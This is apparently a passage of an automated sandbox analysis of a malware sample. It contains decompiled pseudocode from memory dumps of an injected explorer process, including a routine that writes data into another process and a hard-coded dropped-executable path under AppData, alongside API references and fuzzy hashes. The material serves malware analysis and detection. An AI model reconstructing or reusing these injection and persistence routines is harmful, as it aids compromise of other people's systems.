										E01514080( &_v16);
										_t85 = _v12;
										asm("adc ecx, ebx");
										E015018B9(_v16 + 0x1e, _v12);
										_t41 =  *0x1537904; // 0x1909e28
										E015160B0( *((intOrPtr*)(_t41 + 4)), 1, 0);
										_t43 =  *0x1537904; // 0x1909e28
										 *((intOrPtr*)(_t43 + 0x2676)) = 0;
										E01513BA0(_v12,  &_v524, 0, 0x1fa);
										_t46 =  *0x1537904; // 0x1909e28
										_t48 = lstrlenA(_t46 + 0x2494);
										_t49 =  *0x1537904; // 0x1909e28
										E01513AC0(_v12,  &_v492, _t49 + 0x2494, _t48);
										_t53 =  *0x1537904; // 0x1909e28
										_t55 = lstrlenA(_t53 + 0x24b4);
										_t56 =  *0x1537904; // 0x1909e28
										E01513AC0(_v12,  &_v476, _t56 + 0x24b4, _t55);
										_t60 =  *0x1537904; // 0x1909e28
										_t62 = lstrlenA(_t60 + 0x2474);
										_t63 =  *0x1537904; // 0x1909e28
										__eflags = _t63 + 0x2474;
										E01513AC0(_t85,  &_v524, _t63 + 0x2474, _t62);
										_t67 =  *0x1537904; // 0x1909e28
										_v156 =  *((intOrPtr*)(_t67 + 0x25d6));
										_v152 = E015077B8(_t86);
										E0150107B( *0x1537904, 1, 0,  &_v524, 0x1fa);
										_t72 =  *0x1537904; // 0x1909e28
										_t31 =  *(_t72 + 4);
									} else {
										goto L9;
									}
								}
							} else {
								 *((intOrPtr*)(_t83 + 0x2676)) =  *((intOrPtr*)(_t83 + 0x2676)) + 1;
								_t31 = _t34 | 0xffffffff;
							}
						}
						return _t31;
					} else {
						_t73 =  *0x1537904; // 0x1909e28
						 *((intOrPtr*)(_t73 + 0x2676)) =  *((intOrPtr*)(_t73 + 0x2676)) + 1;
						_t74 = _t73 | 0xffffffff;
						__eflags = _t74;
						return _t74;
					}
				} else {
					_t75 =  *0x1537904; // 0x1909e28
					 *((intOrPtr*)(_t75 + 0x2676)) =  *((intOrPtr*)(_t75 + 0x2676)) + 1;
					_t76 = 0xfffffffe;
					return _t76;
				}
			}

0x01501d04
0x01501d0d
0x01501d14
0x01501d2a
0x01501d35
0x01501d3c
0x01501d3e
0x01501d53
0x01501d59
0x01501db2
0x01501db4
0x01501d5b
0x01501d5b
0x01501d6e
0x01501d73
0x01501d7c
0x01501d7f
0x01501d81
0x01501d91
0x01501d97
0x00000000
0x01501d99
0x01501d99
0x01501d9e
0x01501da4
0x01501daa
0x01501db0
0x01501dc0
0x01501dc8
0x01501dce
0x01501dd2
0x01501dd7
0x01501de2
0x01501de7
0x01501df2
0x01501e00
0x01501e05
0x01501e19
0x01501e1c
0x01501e2e
0x01501e33
0x01501e41
0x01501e44
0x01501e56
0x01501e5b
0x01501e69
0x01501e6c
0x01501e71
0x01501e7e
0x01501e83
0x01501e8e
0x01501e9a
0x01501eb0
0x01501eb5
0x01501eba
0x00000000
0x00000000
0x00000000
0x01501db0
0x01501d83
0x01501d83
0x01501d89
0x01501d89
0x01501d81
0x01501ec4
0x01501d40
0x01501d40
0x01501d45
0x01501d4b
0x01501d4b
0x01501d4f
0x01501d4f
0x01501d16
0x01501d16
0x01501d1b
0x01501d23
0x01501d25
0x01501d25

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d184ee4f0acc873fb31ec12d7c36264755daf7994a80771f3a6459fa489eb527
Instruction ID: 6e83b3c8cb7304ee947a102f09580b406bfb2fcbf9b8795f2618a9fd8c50de26
Opcode Fuzzy Hash: d184ee4f0acc873fb31ec12d7c36264755daf7994a80771f3a6459fa489eb527
Instruction Fuzzy Hash: EF4190B3D00109ABD722DBA8DD88EA637ACBB89314F0506A5F525DF2A6D731E944CB50

Uniqueness

Uniqueness Score: 0.00%

Function 01517B80, Relevance: 3.9, APIs: 3, Instructions: 133
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E01517B80(void* __ecx, WCHAR* _a4, signed int _a8, intOrPtr _a12, short _a16) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				void* _v20;
				WCHAR* _t52;
				short _t56;
				void* _t69;
				void* _t71;
				void* _t102;
				void* _t103;
				void* _t104;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t52 = E01513960(__ecx, 0x448);
				_t103 = _t102 + 4;
				_v16 = _t52;
				if(_v16 != 0) {
					_v16[0x21a] = _a8;
					_v16[0x21c] = _a16;
					lstrcpynW(_v16, _a4, 0x200);
					_t81 = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) != 1) {
						_t56 = E01513960(_t81, 0x100000); // executed
						_t104 = _t103 + 4;
						_v16[0x212] = _t56;
						if(_v16[0x212] != 0) {
							_v16[0x216] = 0x100000;
							if(_a12 != 0) {
								E01517820(_v16, _a12);
							}
							L20:
							return _v16;
						}
						while(0 != 0) {
						}
						L21:
						if(_v8 != 0) {
							E01513990( &_v8, 0);
							_t104 = _t104 + 8;
						}
						if(_v16 != 0) {
							if(_v16[0x218] != 0) {
								CloseHandle(_v16[0x218]);
							}
							if(_v16[0x212] != 0) {
								E01513990( &(_v16[0x212]), 0);
								_t104 = _t104 + 8;
							}
							E01513990( &_v16, 0);
						}
						return 0;
					}
					_v20 = 0;
					_t69 = E01519030(_t81, _a4,  &_v12); // executed
					_t104 = _t103 + 8;
					_v8 = _t69;
					if(_v8 != 0) {
						_t71 = E01517870(_v16, _v8, _v12, _a12);
						_t104 = _t104 + 0x10;
						_v20 = _t71;
						if(_v20 >= 0) {
							CloseHandle(_v16[0x218]); // executed
							_v16[0x218] = 0;
							E01513990( &_v8, 0);
							goto L20;
						}
						while(0 != 0) {
						}
						goto L21;
					}
					while(0 != 0) {
					}
					goto L21;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x01517b86
0x01517b8d
0x01517b94
0x01517ba0
0x01517ba5
0x01517ba8
0x01517baf
0x01517bc4
0x01517bd0
0x01517be3
0x01517be9
0x01517bf0
0x01517c7c
0x01517c81
0x01517c87
0x01517c97
0x01517ca4
0x01517cb2
0x01517cbc
0x01517cc1
0x01517cc4
0x00000000
0x01517cc4
0x01517c99
0x01517c9d
0x01517cc9
0x01517ccd
0x01517cd5
0x01517cda
0x01517cda
0x01517ce1
0x01517ced
0x01517cf9
0x01517cf9
0x01517d09
0x01517d17
0x01517d1c
0x01517d1c
0x01517d25
0x01517d2a
0x00000000
0x01517d2d
0x01517bf6
0x01517c05
0x01517c0a
0x01517c0d
0x01517c14
0x01517c31
0x01517c36
0x01517c39
0x01517c40
0x01517c54
0x01517c5d
0x01517c6d
0x00000000
0x01517c72
0x01517c42
0x01517c46
0x00000000
0x01517c48
0x01517c16
0x01517c1a
0x00000000
0x01517c1c
0x01517bb1
0x01517bb5
0x00000000

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

lstrcpynW.KERNEL32(00000000,00000000,00000200,?,00000000), ref: 01517BE3
CloseHandle.KERNEL32(?), ref: 01517C54
CloseHandle.KERNEL32(?), ref: 01517CF9

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle$AllocHeaplstrcpyn
String ID:
API String ID: 1009892751-0
Opcode ID: eccfb185b64c1cf96d1fbd285f53812da87be15a8fdf42e53f4ceb92b014e116
Instruction ID: 06e4388eced85547014fc9b2a89b4eff3443aed5885fd3ece78e09163ea2d629
Opcode Fuzzy Hash: eccfb185b64c1cf96d1fbd285f53812da87be15a8fdf42e53f4ceb92b014e116
Instruction Fuzzy Hash: 9C51A3B5D00209EBEB06DF98C884BEDB7B5FB48308F1489A9EA155F389E7709744CB51

Uniqueness

Uniqueness Score: 4.31%

Function 003F56C0, Relevance: 3.9, APIs: 3, Instructions: 133
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E003F56C0(void* __ecx, WCHAR* _a4, signed int _a8, intOrPtr _a12, short _a16) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				void* _v20;
				WCHAR* _t52;
				short _t56;
				void* _t69;
				void* _t71;
				void* _t102;
				void* _t103;
				void* _t104;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t52 = E003F3EE0(__ecx, 0x448);
				_t103 = _t102 + 4;
				_v16 = _t52;
				if(_v16 != 0) {
					_v16[0x21a] = _a8;
					_v16[0x21c] = _a16;
					lstrcpynW(_v16, _a4, 0x200);
					_t81 = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) != 1) {
						_t56 = E003F3EE0(_t81, 0x100000);
						_t104 = _t103 + 4;
						_v16[0x212] = _t56;
						if(_v16[0x212] != 0) {
							_v16[0x216] = 0x100000;
							if(_a12 != 0) {
								E003F5360(_v16, _a12);
							}
							L20:
							return _v16;
						}
						while(0 != 0) {
						}
						L21:
						if(_v8 != 0) {
							E003F3F10( &_v8, 0);
							_t104 = _t104 + 8;
						}
						if(_v16 != 0) {
							if(_v16[0x218] != 0) {
								CloseHandle(_v16[0x218]);
							}
							if(_v16[0x212] != 0) {
								E003F3F10( &(_v16[0x212]), 0);
								_t104 = _t104 + 8;
							}
							E003F3F10( &_v16, 0);
						}
						return 0;
					}
					_v20 = 0;
					_t69 = E003F86D0(_t81, _a4,  &_v12); // executed
					_t104 = _t103 + 8;
					_v8 = _t69;
					if(_v8 != 0) {
						_t71 = E003F53B0(_v16, _v8, _v12, _a12);
						_t104 = _t104 + 0x10;
						_v20 = _t71;
						if(_v20 >= 0) {
							CloseHandle(_v16[0x218]); // executed
							_v16[0x218] = 0;
							E003F3F10( &_v8, 0);
							goto L20;
						}
						while(0 != 0) {
						}
						goto L21;
					}
					while(0 != 0) {
					}
					goto L21;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f56c6
0x003f56cd
0x003f56d4
0x003f56e0
0x003f56e5
0x003f56e8
0x003f56ef
0x003f5704
0x003f5710
0x003f5723
0x003f5729
0x003f5730
0x003f57bc
0x003f57c1
0x003f57c7
0x003f57d7
0x003f57e4
0x003f57f2
0x003f57fc
0x003f5801
0x003f5804
0x00000000
0x003f5804
0x003f57d9
0x003f57dd
0x003f5809
0x003f580d
0x003f5815
0x003f581a
0x003f581a
0x003f5821
0x003f582d
0x003f5839
0x003f5839
0x003f5849
0x003f5857
0x003f585c
0x003f585c
0x003f5865
0x003f586a
0x00000000
0x003f586d
0x003f5736
0x003f5745
0x003f574a
0x003f574d
0x003f5754
0x003f5771
0x003f5776
0x003f5779
0x003f5780
0x003f5794
0x003f579d
0x003f57ad
0x00000000
0x003f57b2
0x003f5782
0x003f5786
0x00000000
0x003f5788
0x003f5756
0x003f575a
0x00000000
0x003f575c
0x003f56f1
0x003f56f5
0x00000000

APIs

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

lstrcpynW.KERNEL32(?,?,00000200), ref: 003F5723
CloseHandle.KERNEL32(?), ref: 003F5794
CloseHandle.KERNEL32(00000000), ref: 003F5839

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle$AllocHeaplstrcpyn
String ID:
API String ID: 1009892751-0
Opcode ID: 5519eeb5d1962f3540dcffddf448c971e85566c1a1b76c58022477200b52403d
Instruction ID: 639f2d65176a41381c45e2dfd17ec0fcf401f5584b9a26e75e015dada749dcc4
Opcode Fuzzy Hash: 5519eeb5d1962f3540dcffddf448c971e85566c1a1b76c58022477200b52403d
Instruction Fuzzy Hash: C95170B5E0060CEFCB01EFA4D845BBEB7B4AF44304F6485A9EB159B281D7749B44CB91

Uniqueness

Uniqueness Score: 4.31%

Function 01513990, Relevance: 3.8, APIs: 3, Instructions: 39
stringmemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01513990(void** _a4, int _a8) {
				intOrPtr* _t12;
				int _t16;
				void* _t21;

				_t12 = _a4;
				if( *_t12 == 0) {
					return _t12;
				}
				if(_a8 != 0xffffffff) {
					if(_a8 == 0xfffffffe) {
						_a8 = lstrlenW( *_a4);
					}
				} else {
					_a8 = lstrlenA( *_a4);
				}
				E01513BA0( *_a4,  *_a4, 0, _a8);
				_t21 =  *0x1538850; // 0x18e0000
				_t16 = HeapFree(_t21, 0,  *_a4); // executed
				 *_a4 = 0;
				return _t16;
			}

0x01513993
0x01513999
0x015139fa
0x015139fa
0x0151399f
0x015139b6
0x015139c4
0x015139c4
0x015139a1
0x015139ad
0x015139ad
0x015139d3
0x015139e3
0x015139ea
0x015139f3
0x00000000

APIs

lstrlenA.KERNEL32(01515216,?,0151546E,01516857,000000FF), ref: 015139A7
lstrlenW.KERNEL32(?,?,0151546E,01516857,000000FF), ref: 015139BE
HeapFree.KERNEL32(018E0000,00000000,00000000), ref: 015139EA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeHeap
String ID:
API String ID: 4056650430-0
Opcode ID: 323105f6e017e7fb6f0fb5ed4eb4cd199b4dd53deed4aa69e33c59dfed327627
Instruction ID: 02d83a0ceb8f7f6f1739ecce82b9bd3f86d330952a5ab8189f7945d48c07242c
Opcode Fuzzy Hash: 323105f6e017e7fb6f0fb5ed4eb4cd199b4dd53deed4aa69e33c59dfed327627
Instruction Fuzzy Hash: 5D01C874500305AFDB25CF64D494A693B65BB89370F10C658F9698F394C735E940CF90

Uniqueness

Uniqueness Score: 4.65%

Function 003F3F10, Relevance: 3.8, APIs: 3, Instructions: 39
stringmemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E003F3F10(void** _a4, int _a8) {
				intOrPtr* _t12;
				int _t16;
				void* _t21;

				_t12 = _a4;
				if( *_t12 == 0) {
					return _t12;
				}
				if(_a8 != 0xffffffff) {
					if(_a8 == 0xfffffffe) {
						_a8 = lstrlenW( *_a4);
					}
				} else {
					_a8 = lstrlenA( *_a4);
				}
				E003F4120( *_a4,  *_a4, 0, _a8);
				_t21 =  *0x40f6e0; // 0x15a0000
				_t16 = HeapFree(_t21, 0,  *_a4); // executed
				 *_a4 = 0;
				return _t16;
			}

0x003f3f13
0x003f3f19
0x003f3f7a
0x003f3f7a
0x003f3f1f
0x003f3f36
0x003f3f44
0x003f3f44
0x003f3f21
0x003f3f2d
0x003f3f2d
0x003f3f53
0x003f3f63
0x003f3f6a
0x003f3f73
0x00000000

APIs

lstrlenA.KERNEL32(003F7F26,?,003F817E,003F7D67,000000FF), ref: 003F3F27
lstrlenW.KERNEL32(?,?,003F817E,003F7D67,000000FF), ref: 003F3F3E
HeapFree.KERNEL32(015A0000,00000000,00000000), ref: 003F3F6A

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeHeap
String ID:
API String ID: 4056650430-0
Opcode ID: 0a90dbd0c06388ea5a1aca5886f63cbd024eabedf30af57dc12c146306030436
Instruction ID: 5ebf0c2bfab1c1fda4af84d56de1de21fc19e6d96b1e222f0a12c1f0c22a4157
Opcode Fuzzy Hash: 0a90dbd0c06388ea5a1aca5886f63cbd024eabedf30af57dc12c146306030436
Instruction Fuzzy Hash: EB01C474600308EFCB15CF64D894A6A3B75EB89761F10C268FA698F390C735EA81CF94

Uniqueness

Uniqueness Score: 4.65%

Function 003F8AF0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89
UNIQUE

Download Yara Rule

C-Code - Quality: 38%

			E003F8AF0(signed int _a4, char _a8) {
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				char _v72;
				intOrPtr _v76;
				signed int _t30;
				intOrPtr _t31;
				char _t35;
				intOrPtr _t38;
				signed int _t39;
				intOrPtr _t52;
				void* _t55;
				void* _t57;
				void* _t59;
				void* _t61;

				_v52 = 0;
				_v48 = 1;
				if(_a4 <= 1) {
					__eflags = _a8;
					if(_a8 == 0) {
						_v76 = 0x40f804;
					} else {
						_v76 = _a8;
					}
					_push(0);
					_push(0xa);
					_push( &_v68);
					_t30 = _a4;
					_push(_t30);
					L00400446();
					_push(_t30);
					_push(0x40880c);
					_push(0x408808);
					_push(0x408804);
					_t31 = E003F4C10(_v76);
					_t57 = _t55 + 0x24;
					_v52 = _t31;
					__eflags = _v52;
					if(__eflags == 0) {
						L19:
						return _v48;
					} else {
						_v72 = 0;
						E003F6F80(__eflags,  &_v44, _v52);
						_push(0);
						_push( &_v44);
						_push(0x408800);
						_t52 =  *0x4117a8; // 0x15a075e
						_t35 = E003F4C10(_t52);
						_t59 = _t57 + 0x18;
						_v72 = _t35;
						__eflags = _v72;
						if(_v72 == 0) {
							L18:
							E003F3F10( &_v72, 0xffffffff);
							goto L19;
						} else {
							goto L9;
						}
						while(1) {
							L9:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t38 = E003F7050(_v72, _v72); // executed
						_t61 = _t59 + 4;
						 *((intOrPtr*)(0x40f6f4 + _a4 * 4)) = _t38;
						_t39 = _a4;
						__eflags =  *((intOrPtr*)(0x40f6f4 + _t39 * 4));
						if( *((intOrPtr*)(0x40f6f4 + _t39 * 4)) != 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							L17:
							E003F3F10( &_v72, 0xffffffff);
							_t59 = _t61 + 8;
							goto L18;
						} else {
							goto L12;
						}
						while(1) {
							L12:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v48 = 0;
						goto L17;
					}
				}
				while(0 != 0) {
				}
				return 1;
			}

0x003f8af6
0x003f8afd
0x003f8b08
0x003f8b1a
0x003f8b1e
0x003f8b28
0x003f8b20
0x003f8b23
0x003f8b23
0x003f8b2f
0x003f8b31
0x003f8b36
0x003f8b37
0x003f8b3a
0x003f8b3b
0x003f8b43
0x003f8b44
0x003f8b49
0x003f8b4e
0x003f8b57
0x003f8b5c
0x003f8b5f
0x003f8b62
0x003f8b66
0x003f8c00
0x00000000
0x003f8b6c
0x003f8b6c
0x003f8b7b
0x003f8b83
0x003f8b88
0x003f8b89
0x003f8b8e
0x003f8b95
0x003f8b9a
0x003f8b9d
0x003f8ba0
0x003f8ba4
0x003f8bf2
0x003f8bf8
0x00000000
0x00000000
0x00000000
0x00000000
0x003f8ba6
0x003f8ba6
0x003f8ba6
0x003f8ba8
0x00000000
0x00000000
0x003f8baa
0x003f8bb0
0x003f8bb5
0x003f8bbb
0x003f8bc2
0x003f8bc5
0x003f8bcd
0x003f8bde
0x003f8bde
0x003f8be0
0x00000000
0x00000000
0x003f8be2
0x003f8be4
0x003f8bea
0x003f8bef
0x00000000
0x00000000
0x00000000
0x00000000
0x003f8bcf
0x003f8bcf
0x003f8bcf
0x003f8bd1
0x00000000
0x00000000
0x003f8bd3
0x003f8bd5
0x00000000
0x003f8bd5
0x003f8b66
0x003f8b0a
0x003f8b0e
0x00000000

APIs

_ltoa.MSVCRT(00000001,?,0000000A,00000000), ref: 003F8B3B

Strings

jkfkdm, xrefs: 003F8B28, 003F8B56

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: _ltoa
String ID: jkfkdm
API String ID: 2260271510-2652042395
Opcode ID: 7c8bcef06697cdf1771162b8856fd777632b2a67a9b5c4a24a14a6e735575c81
Instruction ID: 17cd74995a53102c4976386f6e6054c2fe6d1fa48634ca1c62dbc02301d338a6
Opcode Fuzzy Hash: 7c8bcef06697cdf1771162b8856fd777632b2a67a9b5c4a24a14a6e735575c81
Instruction Fuzzy Hash: DA3184F1D0020CABCB19EFA4DC45BFE7774AB44305F248529EA057A2C0EB75AD45CB55

Uniqueness

Uniqueness Score: 100.00%

Function 003F6460, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 359
stringUNIQUE

Download Yara Rule

C-Code - Quality: 45%

			E003F6460(void* __fp0, intOrPtr _a4, intOrPtr _a8, short _a12, short* _a16, short* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				short _v8;
				WCHAR* _v12;
				short _v16;
				short _v20;
				short _v24;
				short _v28;
				short _v32;
				short _v36;
				short _v40;
				short _v44;
				short _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				short _t197;
				WCHAR* _t198;
				short _t208;
				short _t210;
				short _t213;
				short _t215;
				void* _t217;
				intOrPtr _t235;
				intOrPtr _t239;
				intOrPtr _t243;
				intOrPtr _t247;
				intOrPtr _t251;
				WCHAR* _t276;
				WCHAR* _t279;
				WCHAR* _t284;
				WCHAR* _t289;
				WCHAR* _t294;
				WCHAR* _t299;
				short _t309;
				intOrPtr _t321;
				intOrPtr _t327;
				intOrPtr _t333;
				intOrPtr _t339;
				intOrPtr _t345;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				void* _t366;

				_t366 = __fp0;
				_v44 = 0;
				_v24 = 0;
				_v8 = 0;
				_v48 = 0;
				_v20 = 0;
				_v28 = 0;
				_v40 = 0;
				_v16 = 0;
				_v12 = 0;
				_v36 = 0;
				_v32 = 0;
				if(_a28 != 0) {
					if(_a4 != 1) {
						_v8 =  *( *((intOrPtr*)(_a12 + 0x38)) +  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x38)) + 0x3c)) + 0x50);
						_t197 = _a12;
						_t262 =  *(_t197 + 0x38);
						_v48 =  *(_t197 + 0x38);
					} else {
						_v8 =  *( *(_a12 + 0x3c) +  *((intOrPtr*)( *(_a12 + 0x3c) + 0x3c)) + 0x50);
						_t262 = _a12;
						_v48 =  *(_a12 + 0x3c);
					}
					_t198 = E003F68D0(_t262, _v8); // executed
					_t356 = _t355 + 4;
					_v12 = _t198;
					if(_v12 == 0) {
						return 0;
					}
					lstrcpynW(_v12, "C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe", 0x104);
					if(_a24 != 0) {
						E003F3BF0(_a24,  &(_v12[0x104]), _a24, 0x20);
						_t356 = _t356 + 0xc;
					}
					if( *((intOrPtr*)(_a12 + 0x10)) != 0) {
						_t345 = _a8;
						_t251 = E003F4540(_t345,  *((intOrPtr*)(_a12 + 0x10)),  *(_a12 + 0x14));
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t299 = _v12;
						 *((intOrPtr*)(_t299 + 0x2ff)) = _t251;
						 *((intOrPtr*)(_t299 + 0x303)) = _t345;
						_v52 = _v12;
						if(( *(_v52 + 0x2ff) |  *(_v52 + 0x303)) != 0) {
							_v12[0x183] =  *(_a12 + 0x14);
						}
					}
					if( *((intOrPtr*)(_a12 + 0x18)) != 0) {
						_t339 = _a8;
						_t247 = E003F4540(_t339,  *((intOrPtr*)(_a12 + 0x18)),  *(_a12 + 0x1c));
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t294 = _v12;
						 *((intOrPtr*)(_t294 + 0x30b)) = _t247;
						 *((intOrPtr*)(_t294 + 0x30f)) = _t339;
						_v56 = _v12;
						if(( *(_v56 + 0x30b) |  *(_v56 + 0x30f)) != 0) {
							_v12[0x189] =  *(_a12 + 0x1c);
						}
					}
					if( *((intOrPtr*)(_a12 + 0x20)) != 0) {
						_t333 = _a8;
						_t243 = E003F4540(_t333,  *((intOrPtr*)(_a12 + 0x20)),  *(_a12 + 0x24));
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t289 = _v12;
						 *((intOrPtr*)(_t289 + 0x317)) = _t243;
						 *((intOrPtr*)(_t289 + 0x31b)) = _t333;
						_v60 = _v12;
						if(( *(_v60 + 0x317) |  *(_v60 + 0x31b)) != 0) {
							_v12[0x18f] =  *(_a12 + 0x24);
						}
					}
					if( *((intOrPtr*)(_a12 + 0x28)) != 0) {
						_t327 = _a8;
						_t239 = E003F4540(_t327,  *((intOrPtr*)(_a12 + 0x28)),  *(_a12 + 0x2c)); // executed
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t284 = _v12;
						 *((intOrPtr*)(_t284 + 0x323)) = _t239;
						 *((intOrPtr*)(_t284 + 0x327)) = _t327;
						_v64 = _v12;
						if(( *(_v64 + 0x323) |  *(_v64 + 0x327)) != 0) {
							_v12[0x195] =  *(_a12 + 0x2c);
						}
					}
					if( *((intOrPtr*)(_a12 + 0x30)) != 0) {
						_t321 = _a8;
						_t235 = E003F4540(_t321,  *((intOrPtr*)(_a12 + 0x30)),  *(_a12 + 0x34)); // executed
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t279 = _v12;
						 *((intOrPtr*)(_t279 + 0x32f)) = _t235;
						 *((intOrPtr*)(_t279 + 0x333)) = _t321;
						_v68 = _v12;
						if(( *(_v68 + 0x32f) |  *(_v68 + 0x333)) != 0) {
							_v12[0x19b] =  *(_a12 + 0x34);
						}
					}
					while(0 != 0) {
					}
					while(0 != 0) {
					}
					_t208 = E003F63B0(_t366, _v48, _v12, 0x33b);
					_t357 = _t356 + 0xc;
					_v16 = _t208;
					if(_v16 != 0) {
						_t309 = _v16;
						_t210 = E003F4540(_a8, _t309, _v8); // executed
						_t358 = _t357 + 0xc;
						_v20 = _t210;
						if(_v20 != 0) {
							if(_a4 != 1) {
								_v12[0x129] = _v20;
							} else {
								asm("cdq");
								_t276 = _v12;
								 *(_t276 + 0x252) = _v20;
								 *(_t276 + 0x256) = _t309;
							}
							_t213 = E003F4540(_a8, _v12, _v8 + 0x33b); // executed
							_t359 = _t358 + 0xc;
							_v40 = _t213;
							if(_v40 != 0) {
								_t215 = E003F4540(_a8, _a28, _a32); // executed
								_t359 = _t359 + 0xc;
								_v28 = _t215;
								if(_v28 != 0) {
									_t217 =  *0x4119a4(_a8, _v28, _a32, 0x20,  &_v32); // executed
									if(_t217 != 0) {
										while(0 != 0) {
										}
										if(_a16 != 0) {
											 *_a16 = _v28;
										}
										if(_a20 != 0) {
											 *_a20 = _v40;
										}
										E003F3F10( &_v16, _v8);
										E003F3F10( &_v12, 0x33b);
										return _v20;
									}
									while(0 != 0) {
									}
									goto L52;
								}
								goto L52;
							} else {
								L52:
								while(0 != 0) {
								}
								E003F3F10( &_v12, 4);
								E003F3F10( &_v16, 0);
								if(_v20 != 0) {
									 *0x411a5c(_a8, _v20, 0, 0x8000);
								}
								if(_v28 != 0) {
									 *0x411a5c(_a8, _v28, 0, 0x8000);
								}
								if(_v40 != 0) {
									 *0x411a5c(_a8, _v40, 0, 0x8000);
								}
								return 0;
							}
						}
						goto L52;
					}
					goto L52;
				}
				L1:
				if(0 == 0) {
					return 0;
				} else {
				}
				goto L1;
			}

0x003f6460
0x003f6466
0x003f646d
0x003f6474
0x003f647b
0x003f6482
0x003f6489
0x003f6490
0x003f6497
0x003f649e
0x003f64a5
0x003f64ac
0x003f64b7
0x003f64ca
0x003f6500
0x003f6503
0x003f6506
0x003f6509
0x003f64cc
0x003f64df
0x003f64e2
0x003f64e8
0x003f64e8
0x003f6510
0x003f6515
0x003f6518
0x003f651f
0x00000000
0x003f6521
0x003f6536
0x003f6540
0x003f6552
0x003f6557
0x003f6557
0x003f6561
0x003f6571
0x003f6575
0x003f657a
0x003f657d
0x003f657e
0x003f6581
0x003f6587
0x003f6590
0x003f65a5
0x003f65b0
0x003f65b0
0x003f65a5
0x003f65bd
0x003f65cd
0x003f65d1
0x003f65d6
0x003f65d9
0x003f65da
0x003f65dd
0x003f65e3
0x003f65ec
0x003f6601
0x003f660c
0x003f660c
0x003f6601
0x003f6619
0x003f6629
0x003f662d
0x003f6632
0x003f6635
0x003f6636
0x003f6639
0x003f663f
0x003f6648
0x003f665d
0x003f6668
0x003f6668
0x003f665d
0x003f6675
0x003f6685
0x003f6689
0x003f668e
0x003f6691
0x003f6692
0x003f6695
0x003f669b
0x003f66a4
0x003f66b9
0x003f66c4
0x003f66c4
0x003f66b9
0x003f66d1
0x003f66e1
0x003f66e5
0x003f66ea
0x003f66ed
0x003f66ee
0x003f66f1
0x003f66f7
0x003f6700
0x003f6715
0x003f6720
0x003f6720
0x003f6715
0x003f6726
0x003f672a
0x003f672c
0x003f6730
0x003f673f
0x003f6744
0x003f6747
0x003f674e
0x003f6759
0x003f6761
0x003f6766
0x003f6769
0x003f6770
0x003f677b
0x003f6798
0x003f677d
0x003f6780
0x003f6781
0x003f6784
0x003f678a
0x003f678a
0x003f67b0
0x003f67b5
0x003f67b8
0x003f67bf
0x003f67d2
0x003f67d7
0x003f67da
0x003f67e1
0x003f67f7
0x003f67ff
0x003f6809
0x003f680d
0x003f6813
0x003f681b
0x003f681b
0x003f6821
0x003f6829
0x003f6829
0x003f6833
0x003f6844
0x00000000
0x003f684c
0x003f6801
0x003f6805
0x00000000
0x003f6807
0x00000000
0x003f67c1
0x00000000
0x003f6851
0x003f6855
0x003f685d
0x003f686b
0x003f6877
0x003f6888
0x003f6888
0x003f6892
0x003f68a3
